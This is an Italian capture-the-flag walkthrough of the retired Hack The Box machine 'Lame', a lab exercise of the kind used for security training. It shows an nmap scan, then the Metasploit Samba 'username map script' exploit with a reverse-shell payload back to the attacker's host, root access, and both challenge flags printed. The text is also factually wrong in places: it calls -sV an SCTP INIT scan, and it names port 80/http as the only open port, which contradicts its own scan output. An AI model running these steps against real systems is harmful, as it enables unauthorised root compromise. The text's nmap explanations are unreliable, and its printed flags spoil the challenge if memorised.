HTB – Lame {retired}

Con nmap effettuiamo una scansione delle porte e dei servizi aperti; la sintassi è sudo nmap -sV -sT -O -A -p- <INDIRIZZO IP> dove:
-sV indicano un SCTP INIT scan,
-sT indicano un TCP connect scan,
-O indica il riconoscimento del Sistema Operativo,
-A indica una scansione “invasiva”,
-p- indica la scansione di tutte le porte.

La scansione con nmap rivela aperte le seguenti porte:
80 – http.

ali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 10:24 CEST
Nmap scan report for 10.10.10.3
Host is up (0.037s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Effettuata una verifica su Exploit Database risulta che Samba smbd 3.0.20 è vulnerabile a Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit).

Entriamo in metasploit, ricerchiamo e selezioniamo l’exploit.

msf5 exploit(multi/samba/usermap_script) > search "samba 3.0.20"

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------

   14  exploit/multi/samba/usermap_script                     2007-05-14       excellent  No     Samba "username map script" Command Execution

msf5 exploit(multi/samba/usermap_script) > use 14
msf5 exploit(multi/samba/usermap_script) > 

Visualizziamo le opzioni e valorizziamo il parametro RHOSTS con l’ip della macchina target ovvero 10.10.10.3.

sf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > 

Eseguiamo l’exploit ed otteniamo una shell come root

msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.3:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo O8hurGcOL7IXmtbj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "O8hurGcOL7IXmtbj\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (10.10.14.3:4444 -> 10.10.10.3:49765) at 2020-06-11 10:48:43 +0200

whoami
root

Navighiamo nella directory degli utenti per la prima flag:
69454a937d94f5f0225ea00acd2e84c5

cd /home 
ls
ftp
makis
service
user
cd makis
ls
user.txt
cat user.txt
69454a937d94f5f0225ea00acd2e84c5

Navighiamo nella directory root per la seconda ed ultima flag:

cd /root
ls 
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df

Dalla console di Hack The Box possiamo vedere che abbiamo sottomesso con successo la chiave per l’accesso “user” e la chiave per l’accesso “root”.

Leave a Reply

Your email address will not be published. Required fields are marked *